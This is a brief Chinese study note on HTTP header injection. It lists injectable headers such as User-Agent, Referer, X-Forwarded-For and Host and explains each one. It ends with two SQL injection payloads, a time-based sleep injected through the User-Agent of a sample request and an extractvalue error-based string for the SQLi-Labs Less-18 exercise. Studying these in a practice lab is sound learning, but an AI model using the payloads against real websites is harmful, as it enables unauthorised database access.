学习笔记二十五：HTTP Header注入

HTTP头注入也叫HTTP header injection

可被注入的头参数

cookie

站为了辨别用户身份，进行session跟踪而储存在用户本地终端上的数据（通常经过加密）。

Rerferer

浏览器向web服务器表明自己是从哪个页面链接过来的。

User-Agent

使得服务器能够识别客户使用的操作系统，浏览器版本等。（很多数据量大的网站中会记录客户使用的操作系统或浏览器版本等存入数据库中）

X-Forwarded-For

简称XFF头，它代表客户端，也就是HTTP的请求端真实的IP，（通常一些网站的防伪注入功能会记录请求端真实IP地址并写入数据库或某文件[通过修改XFF头可以实现伪造IP]）。

Client-IP

Host

是HTTP 1.1协议中新增的一个请求头，主要用来实现虚拟主机技术。

HTTP 协议 Host 请求头的作用_点滴记录-CSDN博客_host http

注入姿势

GET/HTTP/1.1

Host:www.example.com

Connection:keep-alive

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Upgrade-Insecure-Requests:1

User-Agent:Mozilla/5.0'(select*from(select(sleep(20)))a)#

Accept-Encoding:gzip,deflate,sdch

Accept-Language:en-US,en;q=0.8,fr;q=0.6

SqliLabs靶场-Less18     'andextractvalue(1,concat(0x7e,(select@@version),0x7e))and'1'='1